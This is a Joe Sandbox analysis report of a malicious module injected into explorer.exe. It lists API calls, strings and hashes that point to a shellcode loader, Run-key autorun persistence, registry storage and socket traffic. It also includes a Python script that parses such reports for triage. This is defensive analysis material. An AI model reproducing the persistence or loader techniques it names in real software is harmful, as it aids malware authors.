                          • Instruction ID: 3f089e51c3b36a9a2f19d6ee81ecff365cdb634272bcb0fc812996359f442804
                          • Opcode Fuzzy Hash: 775727bf0992f1fd30e19aae136c0ffe87d5617b5013afb31929f2c8c6fdd627
                          • Instruction Fuzzy Hash: B871D632740B80D6DB2C9F29D880399BBA5F769FE8F584229EB5D43B95DB78C101C700
                          APIs
                          • _errno.LIBCMT ref: 011C10A3
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C10AF
                          • _errno.LIBCMT ref: 011C10F9
                          • _errno.LIBCMT ref: 011C1104
                          • _errno.LIBCMT ref: 011C1136
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C1140
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,011C122F), ref: 011C11B2
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,011C122F), ref: 011C11CF
                          • _errno.LIBCMT ref: 011C11F5
                          • _invalid_parameter_noinfo.LIBCMT ref: 011C1201
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 2295021086-0
                          • Opcode ID: 1022d87718d735e22826c2420f752dd04f721ba2b59c7e068789ea1ebcbc5462
                          • Instruction ID: bd6f7f26f2b625dbe70996cf22134609fd052ab3af547b74340d3b94ce6990a3
                          • Opcode Fuzzy Hash: 1022d87718d735e22826c2420f752dd04f721ba2b59c7e068789ea1ebcbc5462
                          • Instruction Fuzzy Hash: 0441E8327417C1EAFB2D9F79C5803ED7A60FBA5FA8F144228DF5607A96CB3880528711
                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 01195AFE
                          • _LDint.LIBCPMTD ref: 01195B15
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • CreateFileW.KERNEL32 ref: 01195B93
                          • WriteFile.KERNEL32 ref: 01195BF0
                          • CloseHandle.KERNEL32 ref: 01195C13
                          • CloseHandle.KERNEL32 ref: 01195C28
                          • DeleteFileW.KERNEL32 ref: 01195C36
                          Strings
                          • %s\ShellCode_MapLoader64, xrefs: 01195B42
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreateDeleteDintModuleNameWrite_errno_invalid_parameter_noinfo
                          • String ID: %s\ShellCode_MapLoader64
                          • API String ID: 797432855-674329531
                          • Opcode ID: 60f46556b92870cccfb019baeea503ecb8a560fc55a27509f804e55b63d6c3b6
                          • Instruction ID: 67178758424393e9a832f0071cdbb6ae48de1c1b6586a6367a6a644303ead6ea
                          • Opcode Fuzzy Hash: 60f46556b92870cccfb019baeea503ecb8a560fc55a27509f804e55b63d6c3b6
                          • Instruction Fuzzy Hash: 9B311572228AC486DB74DB24F8983DA6365F784764F800326C7A983AA8DF3DC509CB44
                          APIs
                          Strings
                          • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 0119F3C5
                          • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0119F382
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseDeleteOpenValue
                          • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 849931509-2226521311
                          • Opcode ID: fb276229a674de8715936c9b58969c6cc9acf20c30ef889c208bad92fac1ddce
                          • Instruction ID: f76a5665491e86aebd43a4a427dc0042f9b29fab6f697da145b9b9206e2b6fcd
                          • Opcode Fuzzy Hash: fb276229a674de8715936c9b58969c6cc9acf20c30ef889c208bad92fac1ddce
                          • Instruction Fuzzy Hash: B801F475214A45D2EF28DF55E8543D57370F784B59F800229EEAE426B8DF2CC24AD744
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocalund_memcpy$FreeVirtual
                          • String ID:
                          • API String ID: 2616075706-0
                          • Opcode ID: 2a9f05bee8dbbb8b72bb69cf12b0853c41c36a6a931afabf8e845caff4e88dcf
                          • Instruction ID: 7e64f5a0d29a3540781b806cd13b122452247720baa75921b29a33efa0cbcecb
                          • Opcode Fuzzy Hash: 2a9f05bee8dbbb8b72bb69cf12b0853c41c36a6a931afabf8e845caff4e88dcf
                          • Instruction Fuzzy Hash: B981AE767096C09ADBB4CB19E4907EBB7A0E7C9784F408026EB8987B58DF3CD5848F40
                          APIs
                          • _lock.LIBCMT ref: 011BE7C9
                            • Part of subcall function 011C0C94: _amsg_exit.LIBCMT ref: 011C0CBE
                          • DecodePointer.KERNEL32(?,?,?,?,?,00000000,00000000,011BE98D,?,?,00000000,011C0CC3,?,?,00000000,011BACB5), ref: 011BE7FC
                          • DecodePointer.KERNEL32(?,?,?,?,?,00000000,00000000,011BE98D,?,?,00000000,011C0CC3,?,?,00000000,011BACB5), ref: 011BE81A
                          • DecodePointer.KERNEL32(?,?,?,?,?,00000000,00000000,011BE98D,?,?,00000000,011C0CC3,?,?,00000000,011BACB5), ref: 011BE85A
                          • DecodePointer.KERNEL32(?,?,?,?,?,00000000,00000000,011BE98D,?,?,00000000,011C0CC3,?,?,00000000,011BACB5), ref: 011BE874
                          • DecodePointer.KERNEL32(?,?,?,?,?,00000000,00000000,011BE98D,?,?,00000000,011C0CC3,?,?,00000000,011BACB5), ref: 011BE884
                          • _initterm.LIBCMT ref: 011BE8C4
                          • _initterm.LIBCMT ref: 011BE8D7
                          • ExitProcess.KERNEL32 ref: 011BE910
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
                          • String ID:
                          • API String ID: 3873167975-0
                          • Opcode ID: a1f47c094e4e4953c5fab44b72d2a893ed509ee766285a7135e593ee47be9210
                          • Instruction ID: e35d620c3a3b4a73f32c12ba47f167b4e9b5c86e3047e7a46fc5dc62721afdbb
                          • Opcode Fuzzy Hash: a1f47c094e4e4953c5fab44b72d2a893ed509ee766285a7135e593ee47be9210
                          • Instruction Fuzzy Hash: 19316631212F5182EA589B15FCC43DAA6A5FB88BD8F040539EB8E43B64EF38C496C740
                          APIs
                          • setsockopt.WS2_32 ref: 011A482D
                          • shutdown.WS2_32 ref: 011A4B57
                          • closesocket.WS2_32 ref: 011A4B62
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timer$ChangeConcurrency::details::platform::__Queueclosesocketsetsockoptshutdown
                          • String ID: $!$"$#
                          • API String ID: 2104284462-1968938309
                          • Opcode ID: a043c244513a51406772d522da2fb0a37924ee5b3aedf25c67c640e4eaa52c9a
                          • Instruction ID: 6c70abd014d71e1a464d3a14f0cb5c72064572cc410416944f6042753f1b9da2
                          • Opcode Fuzzy Hash: a043c244513a51406772d522da2fb0a37924ee5b3aedf25c67c640e4eaa52c9a
                          • Instruction Fuzzy Hash: 0D819F76208BC58AE7748F05E4883DABBA4F3D8348F544129D6C94BB99DBBEC148CF40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateHandleThread$EventObjectResumeSingleWait
                          • String ID: d
                          • API String ID: 3200977696-2564639436
                          • Opcode ID: f5302871f297c8678636ad51d7a76881c1e65371eb42b55c65bece8cb42385e9
                          • Instruction ID: 9e3456078538e8073800b569bd55db4b3f06893d537e89dd84aecfebfda5dcd6
                          • Opcode Fuzzy Hash: f5302871f297c8678636ad51d7a76881c1e65371eb42b55c65bece8cb42385e9
                          • Instruction Fuzzy Hash: F831A736218B8486DB58DB1AF49439AB7B0F3C9B94F115126EB9E43B68CF7DC495CB00
                          APIs
                          • setsockopt.WS2_32 ref: 0119DD60
                          • OpenEventW.KERNEL32 ref: 0119DDBE
                          • SetEvent.KERNEL32 ref: 0119DDDF
                          • CloseHandle.KERNEL32 ref: 0119DDED
                          • shutdown.WS2_32 ref: 0119DDFD
                          • closesocket.WS2_32 ref: 0119DE08
                            • Part of subcall function 0119FBA0: CreateDirectoryW.KERNEL32 ref: 0119FBD8
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FBE3
                            • Part of subcall function 0119FBA0: LocalAlloc.KERNEL32 ref: 0119FBFE
                            • Part of subcall function 0119FBA0: CreateFileW.KERNEL32 ref: 0119FC6E
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FC79
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD16
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD21
                          Strings
                          • {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}, xrefs: 0119DDB0
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CreateErrorEventFreeLast$AllocCloseDirectoryFileHandleOpenclosesocketsetsockoptshutdown
                          • String ID: {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}
                          • API String ID: 1185697187-2411808274
                          • Opcode ID: 2bdff3738b774a56051df30cc75428fcdc530801698b2222cc13ded8fef0f17c
                          • Instruction ID: 1693062237fcc11b2b4484266db393d63e6f3da38c4c380940d4fb30fdf901a2
                          • Opcode Fuzzy Hash: 2bdff3738b774a56051df30cc75428fcdc530801698b2222cc13ded8fef0f17c
                          • Instruction Fuzzy Hash: 6E31EA36209B8486EB64DF95F8443DAB7A0F788794F504126EB9D87BA8DF7CC049CB40
                          APIs
                          Strings
                          • {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}, xrefs: 0119422E
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Event$CloseHandleObjectOpenResetSingleWait
                          • String ID: {29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}
                          • API String ID: 1560999653-2411808274
                          • Opcode ID: 2294103b1f4efe47382a228110117bf86dd9773aad3f9980b1010b855fc37aac
                          • Instruction ID: b659229e123ca56a926033ae2fd00f2db8613f540a98fc46b1e69d6a38f4cc90
                          • Opcode Fuzzy Hash: 2294103b1f4efe47382a228110117bf86dd9773aad3f9980b1010b855fc37aac
                          • Instruction Fuzzy Hash: B1210E30908610C6EF3DAB64FB443E977E0F7C6759F54026AD65A419A5CF3CC19BCA05
                          APIs
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • RegCreateKeyExW.ADVAPI32 ref: 011945F4
                          • RegSetValueExW.ADVAPI32 ref: 0119462B
                          • RegCloseKey.ADVAPI32 ref: 0119463A
                          • RegCloseKey.ADVAPI32 ref: 0119464C
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                           • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                           • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$CreateValue_errno_invalid_parameter_noinfo
                          • String ID: ?$SOFTWARE\%s${7EE6EBB8-7FBC-4C3E-AAB8-F5FE9571F428}
                          • API String ID: 3235468379-2136347929
                          • Opcode ID: 1ba05bfe231b7bc14a5afd147c891102e6ae11a47e7b12bdb5d6c95cd2a4b907
                          • Instruction ID: bd4bc66aab6b6eaef74717b15adfa0123d7093f60c826be3b68153a40338b892
                          • Opcode Fuzzy Hash: 1ba05bfe231b7bc14a5afd147c891102e6ae11a47e7b12bdb5d6c95cd2a4b907
                          • Instruction Fuzzy Hash: 15211A72218B8486EB64DF25F89479AB7A1F784794F804126AA9983B68DFBCC145CB40
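The function summaries above only become actionable when the direct API calls are read together with the strings attributed to the same function: the autorun-key function carries the API ID CloseDeleteOpenValue (RegDeleteValue, not RegSetValueEx, so it removes the Run entry rather than creating one), the ShellCode_MapLoader64 function creates, writes and deletes a file in one routine, and the RegCreateKeyExW/RegSetValueExW function writes a value named by a GUID under SOFTWARE\%s. The Python below is an added example, not Joe Sandbox or DarkVision code: it parses blocks laid out like this report (APIs, Strings, API ID, String ID, Opcode ID) and applies a few such correlation rules. The excerpt it parses is a constructed condensation of the blocks on this page, and the rule names and finding texts are this example's own choices, not report fields.

```python
"""Parse Joe Sandbox function-summary blocks into records and flag API/string combinations."""
import re
from dataclasses import dataclass, field

# Constructed excerpt in the layout of the report above, condensed to four function blocks.
SAMPLE_REPORT = """\
APIs
• RegCreateKeyExW.ADVAPI32 ref: 011945F4
• RegSetValueExW.ADVAPI32 ref: 0119462B
• RegCloseKey.ADVAPI32 ref: 0119463A
  • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
Strings
• Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
• API ID: Close$CreateValue_errno_invalid_parameter_noinfo
• String ID: ?$SOFTWARE\\%s${7EE6EBB8-7FBC-4C3E-AAB8-F5FE9571F428}
• Opcode ID: 1ba05bfe231b7bc14a5afd147c891102e6ae11a47e7b12bdb5d6c95cd2a4b907
APIs
Strings
• SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run, xrefs: 0119F3C5
• API ID: CloseDeleteOpenValue
• String ID: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
APIs
• GetModuleFileNameW.KERNEL32 ref: 01195AFE
• CreateFileW.KERNEL32 ref: 01195B93
• WriteFile.KERNEL32 ref: 01195BF0
• DeleteFileW.KERNEL32 ref: 01195C36
Strings
• %s\\ShellCode_MapLoader64, xrefs: 01195B42
APIs
• setsockopt.WS2_32 ref: 011A3E95
• RtlDecompressBuffer.NTDLL ref: 011A40D1
• closesocket.WS2_32 ref: 011A4218
• String ID:
"""

SUBCALL_RE = re.compile(r"^•\s*Part of subcall function (?P<fn>[0-9A-F]{8}):\s*(?P<name>[\w:]+)\.(?P<mod>\w+)")
API_RE = re.compile(r"^•\s*(?P<name>[\w:]+)\.(?P<mod>\w+)(?:\(.*?\))?,?\s+ref:\s*(?P<addr>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^•\s*(?P<text>.+?),\s*xrefs:\s*(?P<addr>[0-9A-F]{8})$")
ID_RE = re.compile(r"^•\s*(?P<key>API ID|String ID|Opcode ID):\s*(?P<val>.*)$")
GUID_RE = re.compile(r"\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}")


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # direct calls: (name, module, address)
    subcalls: list = field(default_factory=list)  # calls reached only through a subcall
    strings: list = field(default_factory=list)   # (text, xref address)
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""

    def api_names(self) -> set:
        return {name for name, _, _ in self.apis}

    def text(self) -> str:  # every string the block attributes to this function
        return " ".join(s for s, _ in self.strings) + " " + self.string_id


def parse_report(report: str) -> list:
    records, cur = [], None
    for raw in report.splitlines():
        line = raw.strip()
        if line == "APIs":            # each function block opens with this header
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif m := SUBCALL_RE.match(line):
            cur.subcalls.append((m["name"], m["mod"], m["fn"]))
        elif m := API_RE.match(line):
            cur.apis.append((m["name"], m["mod"], m["addr"]))
        elif m := ID_RE.match(line):
            setattr(cur, m["key"].lower().replace(" ", "_"), m["val"].strip())
        elif m := STRING_RE.match(line):
            cur.strings.append((m["text"], m["addr"]))
    return records


def triage(rec: FunctionRecord) -> list:
    """Findings for one function, keyed on direct API calls plus attributed strings."""
    names, text = rec.api_names(), rec.text()
    guids = sorted(set(GUID_RE.findall(text)))
    findings = []
    if "CurrentVersion\\Run" in text:
        how = "sets" if "RegSetValueExW" in names else "opens/deletes" if "Delete" in rec.api_id else "touches"
        findings.append(f"autorun: {how} a value under ...\\CurrentVersion\\Run")
    if "RegSetValueExW" in names and "SOFTWARE\\%s" in text:
        findings.append("registry storage: writes under SOFTWARE\\<name>, value(s) " + ", ".join(guids))
    if {"CreateFileW", "WriteFile", "DeleteFileW"} <= names:
        findings.append("write probe or transient drop: create, write and delete a file in one function")
    if "RtlDecompressBuffer" in names and names & {"setsockopt", "closesocket", "recv"}:
        findings.append("compressed network payload: RtlDecompressBuffer in the socket-handling function")
    if names & {"OpenEventW", "CreateEventW"} and guids:
        findings.append("named event IOC: " + ", ".join(guids))
    return findings


if __name__ == "__main__":
    for i, rec in enumerate(parse_report(SAMPLE_REPORT)):
        print(i, rec.api_id or "(no API ID)", triage(rec))
```

Only direct calls feed the rules; the "Part of subcall function" lines are kept separately so that a CRT helper such as _errno does not get counted against the function that merely calls into it. Lines the report adds for navigation (Source File, Associated, Snapshot File) match none of the patterns and are ignored.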
                          APIs
                          • setsockopt.WS2_32 ref: 011A3E95
                          • LocalAlloc.KERNEL32 ref: 011A4002
                            • Part of subcall function 011B4870: WSACreateEvent.WS2_32 ref: 011B4909
                          • LocalAlloc.KERNEL32 ref: 011A4080
                          • RtlDecompressBuffer.NTDLL ref: 011A40D1
                          • LocalFree.KERNEL32 ref: 011A414E
                            • Part of subcall function 011A6520: LocalFree.KERNEL32 ref: 011A659C
                            • Part of subcall function 011A6520: LocalFree.KERNEL32 ref: 011A65AF
                            • Part of subcall function 011A6520: LocalAlloc.KERNEL32 ref: 011A6607
                            • Part of subcall function 011A6520: LocalAlloc.KERNEL32 ref: 011A6628
                            • Part of subcall function 011A6520: lstrcpyW.KERNEL32 ref: 011A6660
                            • Part of subcall function 011A6520: lstrcpyW.KERNEL32 ref: 011A6679
                            • Part of subcall function 011A6520: lstrcpyW.KERNEL32 ref: 011A6692
                          • LocalFree.KERNEL32 ref: 011A4167
                          • shutdown.WS2_32 ref: 011A420D
                          • closesocket.WS2_32 ref: 011A4218
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                            • Part of subcall function 011B4870: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocFreeTimer$lstrcpy$ChangeConcurrency::details::platform::__Queue$BufferCreateDecompressEventclosesocketsetsockoptshutdown
                          • String ID:
                          • API String ID: 3399760138-0
                          • Opcode ID: 0a80d5ac3141bfa836ddd80b6f3969d78254eaf35f97484459d60846b02bd736
                          • Instruction ID: 341b75e13a13b646204805375c6c185e7f4414a9c0a5d19133074d846fc7ca2e
                          • Opcode Fuzzy Hash: 0a80d5ac3141bfa836ddd80b6f3969d78254eaf35f97484459d60846b02bd736
                          • Instruction Fuzzy Hash: 17A1D776208B818AD774DB14E44479ABBA4F389794F504225EBDD83FA9EBBCD184CF40
